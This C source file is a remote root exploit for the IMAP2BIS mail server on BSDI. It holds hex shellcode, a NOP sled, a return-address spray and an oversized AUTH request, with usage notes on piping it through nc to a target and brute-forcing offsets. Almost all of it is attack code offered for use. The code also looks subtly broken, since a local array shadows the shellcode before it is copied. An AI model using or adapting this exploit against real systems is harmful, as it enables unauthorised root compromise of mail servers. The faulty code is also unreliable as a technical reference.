/*

  BSDI IMAP2BIS remote root exploit

  Usage:   (./imapx <offset>;cat)| nc targethost 143
           
             where offset = -1000..1000  (brute force if 0 doesnt work) 

  Note:
          if you plan to port this to other OS., make sure the
          shellcode doesn't contain lower case chars since imapd
          will toupper() the shellcode, thus fucking it up.
  Note:
          I tested this on a few system's and found this offsets vulnerable

*/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 4092
#define NOP 0x90

char shell[] =
 
   "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "\x42\x49\x4e\x2f\x53\x48\x00";

void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp; 
  char shell[1024+300];

  fprintf(stderr,"usage: %s <offset>\n", argv[0]);

  nop = 403;
  esp = 0xefbfd5e8;
  offset = atoi(argv[1]);
  
  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));
  
  for (i = 1024; i < BUFLEN - 3; i += 2)
{    *((int *) &buf[i]) = esp + (long) offset;
     shell[ sizeof(shell)-1 ] = 0;
} 
 
 printf("{%d} AUTH\r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);
  
  printf("\r\n");

  return;
}